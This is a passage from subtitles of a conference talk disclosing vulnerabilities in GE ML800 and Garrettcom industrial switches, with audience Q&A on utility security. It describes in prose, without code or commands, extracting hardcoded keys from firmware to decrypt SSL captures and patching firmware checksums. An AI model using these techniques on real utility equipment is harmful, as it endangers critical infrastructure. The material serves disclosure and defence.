wireshark. and you use it to decrypt the
321
00:28:15,860 --> 00:28:22,760
SSL you have a self decrypting pcap.
Remember at the beginning it was using
322
00:28:22,760 --> 00:28:29,590
HTTPS to manage the device and upload this
firmware image. So if you happen to have
323
00:28:29,590 --> 00:28:37,210
this firmware image you can decrypt all
the traffic. No forward secrecy, right?
324
00:28:37,210 --> 00:28:41,550
Now you don't have to be lucky and have
concerned citizens send you an email. You
325
00:28:41,550 --> 00:28:46,490
can download this image from the GE website
and you can carve the keys out of the
326
00:28:46,490 --> 00:28:50,100
image in the same way that I did and
decrypt the SSL traffic of any pcap that
327
00:28:50,100 --> 00:29:01,880
is sent to you. Now the passwords
underneath that are in clear text. You can
328
00:29:01,880 --> 00:29:08,040
see them highlighted down here. Password
Manager and user manager. You can see them
329
00:29:08,040 --> 00:29:12,750
up there as well and you can see that
we've decrypted the SSL with that key. So
330
00:29:12,750 --> 00:29:16,559
default keys, right? Is it a big deal? I
believe the vendors in this case say you
331
00:29:16,559 --> 00:29:21,190
can upload your own key to the device. For
those of you who aren't used to working in
332
00:29:21,190 --> 00:29:24,290
embedded it sometimes is difficult to
generate a key on the device because you
333
00:29:24,290 --> 00:29:27,840
don't have enough memory or you don't have
enough entropy or you don't have enough
334
00:29:27,840 --> 00:29:32,270
processing power. That's the usual
excuses. And they're true I shouldn't say
335
00:29:32,270 --> 00:29:36,090
excuses those those things are true. But
you could of course generate it on the
336
00:29:36,090 --> 00:29:39,850
client side and upload it to the device
and that's what they allow you to do with
337
00:29:39,850 --> 00:29:44,790
this switch which is great but where is
your encrypted channel in which to upload
338
00:29:44,790 --> 00:29:52,801
this key? laughs So you can use the serial
device and make sure visually that there's no man
339
00:29:52,801 --> 00:29:55,340
in the middle. But if you're doing this
remotely – and I'd like you to keep in
340
00:29:55,340 --> 00:29:59,460
mind that most substations are remote –
if anyone here works in a utility are you
341
00:29:59,460 --> 00:30:03,530
going to drive to every substation, plug
in a serial cable to change the keys on
342
00:30:03,530 --> 00:30:07,850
all these devices? It's the sort of thing
you need to know in advance right? So the
343
00:30:07,850 --> 00:30:12,100
problem with key management, particularly
with SSL and the industrial systems
344
00:30:12,100 --> 00:30:19,049
environment, is that you have to manage
the keys. And these particular keys, well
345
00:30:19,049 --> 00:30:23,670
the certificates are self signed so you
can't revoke them. And besides industrial
346
00:30:23,670 --> 00:30:27,189
systems are never connected to the
Internet. So it wouldn't have made any
347
00:30:27,189 --> 00:30:32,299
difference. So these are the kind of
problems we're dealing with in this space.
348
00:30:32,299 --> 00:30:35,271
And that's why I'm trying to encourage
you. Whether you do crypto or privacy or
349
00:30:35,271 --> 00:30:37,640
whatever spend a little time in the
embedded space, just for bit: there's
350
00:30:37,640 --> 00:30:46,130
plenty of easy work. OK. So what about the
second key. It requires a password. I
351
00:30:46,130 --> 00:30:50,990
didn't feel like brute forcing it. Maybe
you do. I don't know. I tried all the
352
00:30:50,990 --> 00:30:54,340
strings in the image. A classic technique,
just in case someone had a hard coded the
353
00:30:54,340 --> 00:30:56,580
password. I mean the hard coded
credentials were there but not the hard
354
00:30:56,580 --> 00:31:00,460
coded password. So I guess I gotta start
reversing, and as I previously said I suck
355
00:31:00,460 --> 00:31:06,380
at reversing. That's why I come to CCC, so
I can learn, right? But I did find this
356
00:31:06,380 --> 00:31:11,970
PowerPC ROM image. and I think its running
eCos and redboot and I haven't even gotten
357
00:31:11,970 --> 00:31:15,330
down to doing hardware stuff: taking it
apart, having look at, it but I probably
358
00:31:15,330 --> 00:31:19,200
will in the future. So there's the image
I'm slowly starting to learn my way around
359
00:31:19,200 --> 00:31:27,140
and figure out what's going on. So I had a
look at the image and I figured out that
360
00:31:27,140 --> 00:31:32,100
this key is used for SSH, right? Well it
would be the other encrypted thing. But I
361
00:31:32,100 --> 00:31:36,261
couldn't enable SSH on the device. I try
and enable SSH on the device and I'm
362
00:31:36,261 --> 00:31:39,100
logged in as manager by the way. which is
highest level user on this particular
363
00:31:39,100 --> 00:31:43,580
device, and I put it in the passwords that
I know and a bunch of other passwords and
364
00:31:43,580 --> 00:31:47,590
they don't work. Like I said, I tried all
the strings in the image. So apparently to
365
00:31:47,590 --> 00:31:51,720
enable ssh, I need a password for
something. Now maybe I'm just
366
00:31:51,720 --> 00:31:55,530
misunderstanding or I'm not so clear on
what's going on but I don't know about
367
00:31:55,530 --> 00:31:59,070
you. I kind of feel like if I buy a device
that's supposed to be used for a safety
368
00:31:59,070 --> 00:32:03,440
critical process I should be allowed to
use SSH without having to call up the
369
00:32:03,440 --> 00:32:11,120
vendor and get some special magic
password. So considering I don't like that
370
00:32:11,120 --> 00:32:17,420
approach. What if I patched my own key
into the image right. I don't know the
371
00:32:17,420 --> 00:32:22,201
password of their key but I know the
password of a key I can generate. So I
372
00:32:22,201 --> 00:32:27,290
just need to make sure it's roughly the
right size and try and patch it in. Then
373
00:32:27,290 --> 00:32:29,600
I've got some problems with compression
because I've got to reverse the whole
374
00:32:29,600 --> 00:32:33,570
process that I just described to you patch
it into the larger binary. Will there be
375
00:32:33,570 --> 00:32:44,200
any CRC or firmware signing? I don't know,
right. So the uploaded image is not a
376
00:32:44,200 --> 00:32:50,530
valid image for this device. That's
correct: I messed with it. But I got this
377
00:32:50,530 --> 00:32:54,440
error and it gave me a clue. It gave me a
clue that I did indeed have some of my
378
00:32:54,440 --> 00:33:02,410
CRCs wrong so when I altered the image
again I got to this state. So you're
379
00:33:02,410 --> 00:33:05,510
learning all the time by having a real
device. Now some of my friends they do
380
00:33:05,510 --> 00:33:10,051
static analysis and they don't buy these
devices. I decided to buy this one. I
381
00:33:10,051 --> 00:33:15,750
found one on eBay. It wasn't very
expensive. I mean it depends on your range
382
00:33:15,750 --> 00:33:20,179
for expensive. But if you're helping
defend industrial systems I thought it was
383
00:33:20,179 --> 00:33:26,880
worth the money. So I bought it and this
enables me to try firmware images out and
384
00:33:26,880 --> 00:33:31,210
I can slowly start to figure out what I
need to patch on these firmware images to
385
00:33:31,210 --> 00:33:37,321
do whatever I want. Luckily I just tried
to patch mine to have SSH because I
386
00:33:37,321 --> 00:33:43,799
thought people deserve to have SSH. So
that's an Adler 32 up there on the left
387
00:33:43,799 --> 00:33:50,270
and the other CRC is on the bottom so that
Adler 32 and some adjustment of file
388
00:33:50,270 --> 00:33:54,420
length although zeros in that line just
above it eventually got me to the point
389
00:33:54,420 --> 00:33:59,570
where it believes it's a corrupted binary.
And then we have this CRC on the end that
390
00:33:59,570 --> 00:34:08,210
we need to have a look at. Now I'm a big
fan of suspense. I love suspense. I'm
391
00:34:08,210 --> 00:34:14,849
going to leave that one is a cliffhanger
and an exercise for you watching. So I
392
00:34:14,849 --> 00:34:18,099
said I was going to talk about GE ML800
but I'm also going to talk about
393
00:34:18,099 --> 00:34:21,219
Garrettcom. Luckily it's not very
difficult. Garrettcom is the original
394
00:34:21,219 --> 00:34:27,480
equipment manufacturer for the GE ML800
series. I noticed that because the
395
00:34:27,480 --> 00:34:31,299
certificate I found attached to those
private keys said Garrettcom in it and I
396
00:34:31,299 --> 00:34:35,789
went and looked at their firmware images
and they have similar CRC similar file
397
00:34:35,789 --> 00:34:39,710
structures similar everything so I believe
that they are affected by the cross site
398
00:34:39,710 --> 00:34:45,929
scripting, the denial of service, and
hardcoded keys. I understand from some
399
00:34:45,929 --> 00:34:50,530
people that they have been in contact with
GE to try and fix some of this stuff but
400
00:34:50,530 --> 00:34:57,960
their response to GE was mainly "Sorry,
this is the end of life on this device".
401
00:34:57,960 --> 00:35:02,890
That's fine. I understand you're running a
business but you're selling equipment to
402
00:35:02,890 --> 00:35:08,339
people who manage utilities that we all
depend on. If Sony goes bankrupt because
403
00:35:08,339 --> 00:35:13,799
they get hacked that's one thing right.
But you can't just dissolve a utility and
404
00:35:13,799 --> 00:35:18,670
start again. As my friend Klaus points out
regularly – fantastic insights into the
405
00:35:18,670 --> 00:35:23,150
industrial system world, Klaus and Vanessa
– you can't just dissolve the utility and
406
00:35:23,150 --> 00:35:25,970
start again. You still have the same
infrastructure you still have the same
407
00:35:25,970 --> 00:35:31,249
workers. It doesn't work that way. You
can't bail out utilities that we depend
408
00:35:31,249 --> 00:35:38,329
on. So sorry. End of Life... I don't even
understand why people buy these devices
409
00:35:38,329 --> 00:35:43,130
and this code without code escrow. When
you buy the code make sure you have the
410
00:35:43,130 --> 00:35:48,700
code in perpetuity for these systems so
that you can fix them when something like
411
00:35:48,700 --> 00:35:53,860
this or something worse happens. If I'm
your worst nightmare, you have real
412
00:35:53,860 --> 00:35:59,190
problems because there are very dark
people in the world actually damaging
413
00:35:59,190 --> 00:36:05,460
furnaces in Germany. So me disclosing keys
on stage is scary for you. You need to get
414
00:36:05,460 --> 00:36:12,689
a grip. So, garrettcom?
Here's your key too.
415
00:36:12,689 --> 00:36:20,104
Applause
416
00:36:20,104 --> 00:36:25,629
The strings come from the images.
Developers are funny people really. I like
417
00:36:25,629 --> 00:36:32,110
this. I just put them up because they're
funny. Some people had some hard times, I
418
00:36:32,110 --> 00:36:36,490
guess, writing some of this code. And my
respect to them! They do great work but
419
00:36:36,490 --> 00:36:43,159
you know, there's a couple of things we
can improve on security in these devices.
420
00:36:43,159 --> 00:36:47,840
So I once had the opportunity to stand in
front of six different vendors at the same
421
00:36:47,840 --> 00:36:53,440
time their computer emergency response
teams at a conference and I said to them,
422
00:36:53,440 --> 00:36:59,659
"Will any of you commit to an average
patch time for vulnerabilities of three
423
00:36:59,659 --> 00:37:05,350
months?" An average patch time, because it
might take 8 months, as it so far has
424
00:37:05,350 --> 00:37:10,130
taken in the case of GE and Garrettcom, to
work on these issues. It might take a long
425
00:37:10,130 --> 00:37:15,050
time in some cases but as an average patch
time I think 3 months for things that we
426
00:37:15,050 --> 00:37:20,440
all depend on is reasonable. So I asked
these six different teams in the same
427
00:37:20,440 --> 00:37:29,410
room. If any of them would commit to this
and I heard silence for 30 seconds. So my
428
00:37:29,410 --> 00:37:35,220
friend decided to call this the silence of
the vendors right. And I think that's that
429
00:37:35,220 --> 00:37:42,029
sums it up. I'd like to see better patch
times. I'd like to see a computer
430
00:37:42,029 --> 00:37:45,200
emergency response teams in each of these
vendors and I'd like to see someone
431
00:37:45,200 --> 00:37:53,600
responsible for security in each of these
different utilities. I can dream, right? I
432
00:37:53,600 --> 00:37:57,369
think that key management... the current
practice industrial systems is to take
433
00:37:57,369 --> 00:38:02,679
some insecure protocol and wrap it in SSL
or TLS which is why we need the help of
434
00:38:02,679 --> 00:38:10,180
you privacy people because TLS and SSL
are not the be all and end all. They often
435
00:38:10,180 --> 00:38:16,430
sort of go the wrong way, right. For
example you can use TLS to do integrity
436
00:38:16,430 --> 00:38:20,679
without encryption so you can verify that
every message has reached its destination
437
00:38:20,679 --> 00:38:25,920
intact but it is not encrypted. And this
means that you can still do intrusion
438
00:38:25,920 --> 00:38:32,530
detection analysis of the packets. That's
really good. But nobody uses that in SSL
439
00:38:32,530 --> 00:38:36,669
in other ways right. I'm a big fan of
Shodan and use Shodan for a variety of
440
00:38:36,669 --> 00:38:41,450
different things usually to get a sense of
the Internet as a whole, right? Let me
441
00:38:41,450 --> 00:38:44,729
back up a little bit. When I was at
Cambridge I went to Darwin college and
442
00:38:44,729 --> 00:38:47,690
because you're at Darwin college you read
up a bit on Darwin and you think about how
443
00:38:47,690 --> 00:38:51,870
Darwin thought and I think the Internet is
kind of like that. When it was built by
444
00:38:51,870 --> 00:38:56,870
the IETF and various people, who did
fantastic work, they imagined it one way
445
00:38:56,870 --> 00:39:01,450
and then we inherited it and it grew and
it became an ecosystem and stuff happens
446
00:39:01,450 --> 00:39:05,429
out there that you wouldn't expect. And so
that's why I like Shodan. It's kind of
447
00:39:05,429 --> 00:39:09,869
like being a natural scientist: what's a
survey of the world, what kind of machines
448
00:39:09,869 --> 00:39:13,429
are out there, what versions are they
running, when do people update their SSL..
449
00:39:13,429 --> 00:39:17,559
err, you know, their certificates do they
do it before or after the certificate is
450
00:39:17,559 --> 00:39:22,600
invalid. Do they always upgrade the
algorithm. Do they increase the key size.
451
00:39:22,600 --> 00:39:26,380
You know how do things change right you
need to sort of study it as a whole and
452
00:39:26,380 --> 00:39:30,440
that's my point when it comes to just
taking SSL and slapping it over a
453
00:39:30,440 --> 00:39:37,759
protocol. It's not quite that simple. So
again we need your help. Where can we go
454
00:39:37,759 --> 00:39:42,289
with these attacks. And you remember at
the beginning I pointed out the underpants
455
00:39:42,289 --> 00:39:49,770
gnome. The emperor wears no clothes.
Altering switch configurations is a big
456
00:39:49,770 --> 00:39:57,410
deal because you can exfiltrate process
data. That gives you a map of the process
457
00:39:57,410 --> 00:40:02,500
because industrial systems are bespoke.
Each one of them is different. It does run
458
00:40:02,500 --> 00:40:06,539
different traffic and we are lucky to work
on security in this space because our
459
00:40:06,539 --> 00:40:10,880
users are numerate and literate and they
care about safety. They don't always
460
00:40:10,880 --> 00:40:14,239
understand security but they do care about
safety. So if you can make it a safety
461
00:40:14,239 --> 00:40:18,229
concern they care. There are also
engineers that many of these utilities who
462
00:40:18,229 --> 00:40:24,219
look at the network 24/7. Not all of them
but some of them. Can you imagine a home
463
00:40:24,219 --> 00:40:28,899
network or something else with that kind
of user base. We're lucky we should be
464
00:40:28,899 --> 00:40:35,030
taking advantage of that user base. So
getting back to the point you know denial
465
00:40:35,030 --> 00:40:38,979
of service attacks to disrupt the process
go and see Marmusha's talk. This will all
466
00:40:38,979 --> 00:40:43,039
make a lot more sense when you go and see
her talk. Basically any man in the middle
467
00:40:43,039 --> 00:40:47,990
attack can disrupt alter or drop traffic
at this point. If you can affect the
468
00:40:47,990 --> 00:40:51,740
switches and the substation. And
exfiltrating in the data gives you a map
469
00:40:51,740 --> 00:40:58,109
of the process which leads towards further
potential damage for the utilities. Now
470
00:40:58,109 --> 00:41:01,410
it's not always that simple people will
get up on stage and they will tell you I
471
00:41:01,410 --> 00:41:07,309
am awesome and this is how it's done and
it's easy to blow shit up. It's not true.
472
00:41:07,309 --> 00:41:10,249
It takes a little bit of thought it takes
a little bit of work. I am certainly not
473
00:41:10,249 --> 00:41:15,560
awesome. I am just a quality assurance
person from a former vendor. I just
474
00:41:15,560 --> 00:41:22,509
decided to get into security and keep
going with it. So you can't always perform
475
00:41:22,509 --> 00:41:25,389
these man in the middle attacks. People
will say you can. But the reason you can't
476
00:41:25,389 --> 00:41:30,800
is real-time system constraints. Some
systems will stop receiving traffic five
477
00:41:30,800 --> 00:41:34,539
milliseconds or microseconds later and
ignore anything. If a value doesn't arrive
478
00:41:34,539 --> 00:41:39,209
in this time it doesn't care. So the idea
that you can route the traffic out to some
479
00:41:39,209 --> 00:41:43,590
other country and then back in and disrupt
the process is bollocks. Sometimes you
480
00:41:43,590 --> 00:41:48,029
have to alter the firmware to achieve
that. That depends on the process but I'm
481
00:41:48,029 --> 00:41:52,830
just trying to give you a sense of how
performing actual attacks give you a sense
482
00:41:52,830 --> 00:41:56,120
of what the limits are, what the
logistical burdens are for the attacker
483
00:41:56,120 --> 00:42:04,940
and that's important stuff for us to know.
All right. Little bit of an overview.
484
00:42:04,940 --> 00:42:11,810
Drunk session IDs. brute forcing
MD5+NONCE, cross site request forgery for
485
00:42:11,810 --> 00:42:17,419
firmware upload (of all things),
reflected cross-site scripting (8 cases of
486
00:42:17,419 --> 00:42:23,050
it) pre authentication denial of service,
hardcoded keys times 2 in a firmware
487
00:42:23,050 --> 00:42:28,730
image, SSL without forward secrecy, self
signed certificates so there's no revoking
488
00:42:28,730 --> 00:42:32,280
there's no managing of the keys on these
devices right. Not to mention utility
489
00:42:32,280 --> 00:42:35,989
workers are busy already. They may not
have time to manage all of these devices
490
00:42:35,989 --> 00:42:40,250
we might need to rethink that approach
right. Clear text passwords under SSL
491
00:42:40,250 --> 00:42:44,049
because well no one can break SSL unless
you hard code the key in the firmware
492
00:42:44,049 --> 00:42:49,539
that's downloadable from the internet.
Enable ssh with a password and three
493
00:42:49,539 --> 00:42:55,289
quarter of a year waiting for fixes for
some of this stuff. I'm not happy with
494
00:42:55,289 --> 00:43:00,699
that. I think that we could live in a much
better, much safer world. And to do so we
495
00:43:00,699 --> 00:43:07,909
need to talk very seriously about some of
these issues. Don't take my opinion for
496
00:43:07,909 --> 00:43:11,700
it. Listen to some other people. The best
thing about doing industrial systems work
497
00:43:11,700 --> 00:43:15,480
is the diversity of approach. You know I
love that there are so many other people
498
00:43:15,480 --> 00:43:20,080
doing SCADA and ICS. And I love that
they're going different directions. So in
499
00:43:20,080 --> 00:43:26,030
the future I plan to be on another stage
with some friends and show you some more.
500
00:43:26,030 --> 00:43:30,449
Thank you for listening mustache fans and
as a parting thought. More tax money is
501
00:43:30,449 --> 00:43:35,349
spent on surveillance than on
defending common utilities.
502
00:43:35,349 --> 00:43:44,394
Applaus
503
00:43:44,394 --> 00:43:51,160
Herald: Thank you. It made me a scary
Sunday morning. They got a utility *<<
504
00:43:51,160 --> 00:43:58,119
guess, mostly incomprehensable* down the
road. OK. We'll have some questions taken
505
00:43:58,119 --> 00:44:06,459
please. As the session is recorded and
streamed anything you say, say it into a
506
00:44:06,459 --> 00:44:17,049
mic. Any questions up? Wow, it is Sunday
morning.
507
00:44:17,049 --> 00:44:18,029
Éireann: Number three, sure
508
00:44:18,029 --> 00:44:21,280
Herald: everybody understood everything?
You're kidding me.
509
00:44:21,280 --> 00:44:23,569
Éireann: I've got one right here
Herald: here is a question.
510
00:44:23,569 --> 00:44:30,089
Question: Hey thanks I enjoyed your talk
and I think it's very important to raise
511
00:44:30,089 --> 00:44:37,660
awareness. But I think it's not to raise
awareness. Not much in this community, but
512
00:44:37,660 --> 00:44:43,880
within the engineering community and I see
it a lot of times and many engineers
513
00:44:43,880 --> 00:44:49,730
having lots of problems doing that for
several reasons. There is maybe the
514
00:44:49,730 --> 00:44:55,239
engineer who is thinking about this but
has its miniatures in the back has to deal
515
00:44:55,239 --> 00:45:03,069
with service personnel which know how to
work a hammer and a screwdriver and on the
516
00:45:03,069 --> 00:45:11,450
other side, engineers have to work with
customers which more those lazy people.
517
00:45:11,450 --> 00:45:16,309
And so that's how these things happen. And
I think it's more important to raise
518
00:45:16,309 --> 00:45:22,000
awareness of these kinds of things in the
engineering community.
519
00:45:22,000 --> 00:45:24,730
Éireann: So just to repeat a little bit
for anybody else that couldn't hear it or
520
00:45:24,730 --> 00:45:29,170
for the recording it's very important to
work with the engineers some of the
521
00:45:29,170 --> 00:45:32,469
engineers understand the problem. But
typically management or lower level
522
00:45:32,469 --> 00:45:37,680
service personnel don't always understand
the problem. And it's not important to
523
00:45:37,680 --> 00:45:41,690
raise the awareness in the hacker
community. But more with the engineers is
524
00:45:41,690 --> 00:45:46,299
what you were saying. Right. OK.
Absolutely true. Completely agree with
525
00:45:46,299 --> 00:45:50,920
you. I don't just come to these
conferences and present to you guys. I go
526
00:45:50,920 --> 00:45:54,430
and I present to the engineers too. And in
fact a couple of engineers have come to
527
00:45:54,430 --> 00:45:58,599
this conference because we did work at
other conferences to see what the hacker
528
00:45:58,599 --> 00:46:01,741
community is about and learn things from
the hacker community because this is a
529
00:46:01,741 --> 00:46:05,360
place where you can learn if you're just
not afraid of getting pwned a couple of
530
00:46:05,360 --> 00:46:10,999
times right. And it happens to me too
right. I learned a lot from getting
531
00:46:10,999 --> 00:46:14,249
compromised on my machine and watching
someone do something. Anyways back to the
532
00:46:14,249 --> 00:46:18,380
point I don't just work with engineers or
hackers. I also work with C-level
533
00:46:18,380 --> 00:46:21,920
executives so I'm on a sabbatical from
IOActive at the moment. at the Cambridge
534
00:46:21,920 --> 00:46:26,469
Center for Risk studies, and I'm working
with the insurance people which has its
535
00:46:26,469 --> 00:46:31,441
challenges shall we say. But some of them
are very intelligent people and they want
536
00:46:31,441 --> 00:46:34,670
to understand what's going on with hacking
attacks and they want to approach this
537
00:46:34,670 --> 00:46:40,839
from a slightly different angle. My stake
in that is to be sure that when the
538
00:46:40,839 --> 00:46:45,479
insurance people do get involved that they
actually ask for fixes and improve stuff.
539
00:46:45,479 --> 00:46:49,809
So yes I do my best to raise awareness
wherever I can. And I'm not alone. You can
540
00:46:49,809 --> 00:46:53,769
help me.
Questioner: Thank you
541
00:46:53,769 --> 00:46:58,019
applause
542
00:46:58,019 --> 00:47:05,570
Herald: OK, there's another question here.
Number two. Oh, and up there too, yes we
543
00:47:05,570 --> 00:47:09,380
saw you. OK number two was first I think.
Go ahead
544
00:47:09,380 --> 00:47:13,570
Question: incomprehensible. So you
mentioned a couple of things, err a couple
545
00:47:13,570 --> 00:47:18,440
of vulnerabilities and I was wondering
what you would think an ideal system would
546
00:47:18,440 --> 00:47:24,150
look like. You mentioned key provisioning
of course putting certificates. I assume
547
00:47:24,150 --> 00:47:28,470
that they were different certificates for
different devices rather than the same
548
00:47:28,470 --> 00:47:37,430
certificate for all devices. Okay that's a bad
thing. And and also sort of the way how
549
00:47:37,430 --> 00:47:44,839
the software update management works. So
how would you if you could give them some
550
00:47:44,839 --> 00:47:48,950
advice how to design a system
how would you do it?
551
00:47:48,950 --> 00:47:55,420
Éireann: Okay. So first of all I wouldn't
hard code the keys as you as you discussed
552
00:47:55,420 --> 00:48:01,859
to be in every device the same. It's one
thing to put in your documentation hey you
553
00:48:01,859 --> 00:48:07,630
should update the keys but I mean if I can
patch binary file with a key then there's
554
00:48:07,630 --> 00:48:11,089
no reason you couldn't do that on the
website where you download the firmware
555
00:48:11,089 --> 00:48:15,160
image right. Just as an example as a
thought experiment sort of makes that
556
00:48:15,160 --> 00:48:18,420
clear. The upgrade path for these devices
is download the firmware image from the
557
00:48:18,420 --> 00:48:25,280
website to some machine and then carry it,
because all these systems are airgapped.
558
00:48:25,280 --> 00:48:29,229
to some other location and then upload it
onto the switch right with hardcoded
559
00:48:29,229 --> 00:48:33,869
credentials. So first off whenever you
provision a switch initially you provision
560
00:48:33,869 --> 00:48:36,920
all of the credentials for that device.
That's standard practice of many routers
561
00:48:36,920 --> 00:48:41,900
and other pieces of equipment today. And I
would think less about defending and
562
00:48:41,900 --> 00:48:46,230
securing the device than on being
able to regularly check its integrity,
563
00:48:46,230 --> 00:48:48,539
the integrity of the firmware that is
running and the integrity of the
564
00:48:48,539 --> 00:48:54,289
configuration. So I'd focus on that and I'd
focus on being able to recover the switch
565
00:48:54,289 --> 00:48:57,740
after it's been attacked. So you reverse
your thinking. You assume that one day
566
00:48:57,740 --> 00:49:01,309
someone is going to crack your firmware
signing and crack this and crack that and
567
00:49:01,309 --> 00:49:05,930
you focus on how can I quickly upload a
new firmware image that is known to be
568
00:49:05,930 --> 00:49:12,250
good and verify that the one that is
uploaded is good to this device.
569
00:49:12,250 --> 00:49:16,059
Questioner: Thank you.
Herald: There was a question up there on
570
00:49:16,059 --> 00:49:18,769
the balcony.
Signal angel: Yes we have two questions
571
00:49:18,769 --> 00:49:25,549
here on the net. So the first one is how
would you solve the end of life issue.
572
00:49:25,549 --> 00:49:29,900
Sometimes incomprehensible clients just
gets really outdated.
573
00:49:29,900 --> 00:49:33,420
Éireann: That's absolutely true and it is
slightly unfair of me to be a hard on the
574
00:49:33,420 --> 00:49:38,349
vendors. But it's my job to take the
debate a little bit too far the other way.
575
00:49:38,349 --> 00:49:43,229
So how would I solve the end of life issue
is the question from the internet. I don't
576
00:49:43,229 --> 00:49:47,759
know. I think that's not a technical
problem it's a societal problem. Like when
577
00:49:47,759 --> 00:49:55,970
we buy bridges they are bridges until they
fall down. When we buy roads they stay
578
00:49:55,970 --> 00:49:59,130
there until they go away. I mean there is
probably some end of life issues in there
579
00:49:59,130 --> 00:50:04,960
but it's almost more of a contractual
legal issue and someone should study that.
580
00:50:04,960 --> 00:50:08,339
There are people studying that but it's
not my area of expertise but I'll try and
581
00:50:08,339 --> 00:50:12,969
answer as best I can. I think code escrow
is a good way to go when you buy some of
582
00:50:12,969 --> 00:50:18,079
these devices you say I want the code for
this device in the future. I want to have
583
00:50:18,079 --> 00:50:22,369
access to it. If your company goes
bankrupt I need you to give up the source
584
00:50:22,369 --> 00:50:26,329
code for these devices when you go
bankrupt or when you disappear or when
585
00:50:26,329 --> 00:50:30,380
it's the end of life. There are a couple
of manufacturers out there doing open
586
00:50:30,380 --> 00:50:35,200
source switches. There's a company called
Open gear who are awesome. They gave me a
587
00:50:35,200 --> 00:50:39,790
switch to play with that I haven't had
time to look at yet. I think that's amazing
588
00:50:39,790 --> 00:50:42,700
right. And their code is open source and
you can go and examine it. So you would
589
00:50:42,700 --> 00:50:46,309
have the code anyway. Those are two
different approaches. I think there are
590
00:50:46,309 --> 00:50:49,979
others you can solve this problem
technically or legally or socially but as
591
00:50:49,979 --> 00:50:55,869
a society we depend on these utilities and
that code should not just vanish when it's
592
00:50:55,869 --> 00:51:05,369
difficult or costly to keep it upgraded.
applause
593
00:51:05,369 --> 00:51:08,089
Herald: There was a second
question from the Internet.
594
00:51:08,089 --> 00:51:14,179
Signal angel: Yes, so the second one is:
what should a non-technical person in
595
00:51:14,179 --> 00:51:19,890
the respect of incomprehensible set non-
technical person sent to manage small town
596
00:51:19,890 --> 00:51:25,440
utility do as best practice?
Éireann: I think the first and most
597
00:51:25,440 --> 00:51:29,930
important thing is to look for attacks.
I'm sorry I should probably repeat that
598
00:51:29,930 --> 00:51:33,609
question just to be sure. What should
someone in a small town who manages
599
00:51:33,609 --> 00:51:37,420
utility do to defend themselves and
protect himself. So the first thing is
600
00:51:37,420 --> 00:51:43,129
look for attacks. Even if you spend a few
hours a week looking for something you
601
00:51:43,129 --> 00:51:46,249
script something up or you hire some
college kid to come in and script
602
00:51:46,249 --> 00:51:49,579
something and look for things on your
network and ask questions and yes they're
603
00:51:49,579 --> 00:51:52,279
going to be a pain in the ass and is going
to be difficult. But you're going to learn
604
00:51:52,279 --> 00:51:55,599
things about your network and you might
detect some attacks. The first problem in
605
00:51:55,599 --> 00:52:01,059
utilities is no one is responsible for
security. It's not my job. It's kind of
606
00:52:01,059 --> 00:52:05,480
the mantra so for a small utility find
someone whose job it is if you're a very
607
00:52:05,480 --> 00:52:09,130
small utility there's probably some other
small utilities near you and you can hire
608
00:52:09,130 --> 00:52:13,789
a resource together to come and visit your
different utilities and help you out. The
609
00:52:13,789 --> 00:52:17,380
second one is watch your relationship with
your vendor when you purchase this
610
00:52:17,380 --> 00:52:21,220
equipment you spend a lot of money on it.
Spend a little bit of time doing
611
00:52:21,220 --> 00:52:25,069
penetration tests. Yes I like it when you
hire me but you don't have to hire me.
612
00:52:25,069 --> 00:52:28,071
There are plenty of other people you can
hire who will have a look at the device
613
00:52:28,071 --> 00:52:31,770
and find the simple vulnerabilities. So
when you purchase something make sure you
614
00:52:31,770 --> 00:52:35,469
test it for security purposes and that's
very important because you can even put
615
00:52:35,469 --> 00:52:40,879
into your contract if you fail the
security tests we will pay you less money.
616
00:52:40,879 --> 00:52:44,480
And the vendors are not going to react
to security until you do that. So that's
617
00:52:44,480 --> 00:52:51,429
the second answer. And I wish I had a
third to make it very neat but I don't.
618
00:52:51,429 --> 00:52:55,729
Herald: OK. There was one more
question at mic 4 I think
619
00:52:55,729 --> 00:52:58,500
Questioner: Yes hi thank you for
your time.
620
00:52:58,500 --> 00:53:03,539
Herald: Talk into the mike please. Thank
you for your talk. Q Hi. I'm kind of a
621
00:53:03,539 --> 00:53:12,739
newbie to the C3 community and I am not
sure about the question I want to ask you.
622
00:53:12,739 --> 00:53:16,579
Probably many people understand in this
room but I don't know if I would like to
623
00:53:16,579 --> 00:53:23,780
ask you what exactly do you
mean by arbitrary firmware.
624
00:53:23,780 --> 00:53:28,799
Éireann: No problem. So the question was
What do you mean by arbitrary firmware. I
625
00:53:28,799 --> 00:53:34,349
mean the firmware that I have altered that
was not manufactured by the vendor to do
626
00:53:34,349 --> 00:53:39,230
whatever I want. How do you trust that
this switch sends all the packets that it
627
00:53:39,230 --> 00:53:45,049
should send. What if it's, you know, my
handle is BSB right. What if it drops
628
00:53:45,049 --> 00:53:51,230
every packet that has BSB in the packet.
Right. You can rewrite a firmware image to
629
00:53:51,230 --> 00:53:54,950
do whatever the device can do and in some
cases more things than the device usually
630
00:53:54,950 --> 00:53:59,959
does to damage itself for example. So an
arbitrary firmware is one in which anyone
631
00:53:59,959 --> 00:54:03,489
writes the firmware and there is no
checking to be sure that this is the image
632
00:54:03,489 --> 00:54:08,490
that you want on this device whether it's
provided by the vendor or the community
633
00:54:08,490 --> 00:54:13,239
right. You still want checking that this
is the correct code or the code that you
634
00:54:13,239 --> 00:54:18,309
wanted anyway. Right.
Herald: Okay thank you. Is that a question
635
00:54:18,309 --> 00:54:22,489
here mic 1? OK go ahead.
Questioner: Yes please. In your
636
00:54:22,489 --> 00:54:29,739
hypothetical question, you asked what
damage could I do in that paint factory.
637
00:54:29,739 --> 00:54:39,690
But you can also reverse it. What kind of
company secrets can I obtain for example,
638
00:54:39,690 --> 00:54:45,859
your favorite recipe for your hot
chocolate or the recipes of Coca-Cola.
639
00:54:45,859 --> 00:54:52,839
They are vulnerable as well aren't they.
Éireann: Yes. So the question just again
640
00:54:52,839 --> 00:54:56,559
for everyone else. You don't just have to
talk about damage in a paint factory or
641
00:54:56,559 --> 00:55:01,819
any industrial system. You can also talk
about intellectual property and protecting
642
00:55:01,819 --> 00:55:07,309
the recipes that we use to bake cookies or
make beer or whatever pharmaceuticals
643
00:55:07,309 --> 00:55:12,641
whatever. And that's a fantastic question
and I'm glad you brought it up a couple of
644
00:55:12,641 --> 00:55:15,809
years ago when I was doing... well, more
than a couple of years like eight years
645
00:55:15,809 --> 00:55:19,249
ago, when I was doing industrial system
security I realized I wasn't getting a lot
646
00:55:19,249 --> 00:55:23,489
of traction. It was before stuxnet, I was
a quality assurance guy. Everybody thought
647
00:55:23,489 --> 00:55:34,309
